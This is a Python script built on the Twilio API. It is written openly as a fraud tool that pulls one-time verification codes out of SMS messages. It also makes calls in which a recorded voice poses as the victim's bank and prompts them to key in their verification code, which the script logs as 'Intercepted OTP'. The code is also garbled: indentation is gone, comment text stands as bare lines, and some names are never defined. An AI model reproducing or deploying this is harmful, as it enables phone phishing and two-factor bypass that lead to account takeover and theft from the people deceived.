from twilio.rest import Client
from twilio.twiml.voice_response import VoiceResponse, Say
import re
account_sid = '<your Twilio account SID>'
auth_token = '<your Twilio auth token>'
client = Client(account_sid, auth_token)
message_regex = re.compile(r'.*?Your\s+verification\s+code\s+is:\s+(\d+)\s+.*', re.MULTILINE | re.DOTALL)
def handle_sms(message):

Extract OTP from SMS

match = message_regex.match(message.body)
if match:
otp = match.group(1)

Log OTP for later use

print(f'Intercepted OTP: {otp}')
def handle_call(call):

Generate TwiML response to deceive victim into giving OTP

response = VoiceResponse()
response.say('Hello, this is your bank calling to verify your account. To proceed, please enter your verification code')

Store user input and log OTP

with response.gather(num_digits=6, action='/process_input', method='POST') as gather:
gather.say('Please enter your verification code followed by the pound sign')

Return TwiML response

return str(response)
def handle_input(input_data):

Extract OTP from user input

otp = input_data.get('Digits')
if otp:

Log OTP for later use

print(f'Intercepted OTP: {otp}')
# Listen for incoming SMS messages and calls
messages = client.messages.list()
for message in messages:
handle_sms(message)
calls = client.calls.list()
for call in calls:
response = handle_call(call)

Update call with TwiML response

client.calls(call.sid).update(twiml=response)

# Process user input
if 'HTTP_X_TWILIO_SIGNATURE' in request.headers:

Verify request signature

signature = request.headers['HTTP_X_TWILIO_SIGNATURE']
url = request.url
params = request.form
twilio_request_validator.validate(signature, url, params)

Handle user input

input_data = request.form
handle_input(input_data)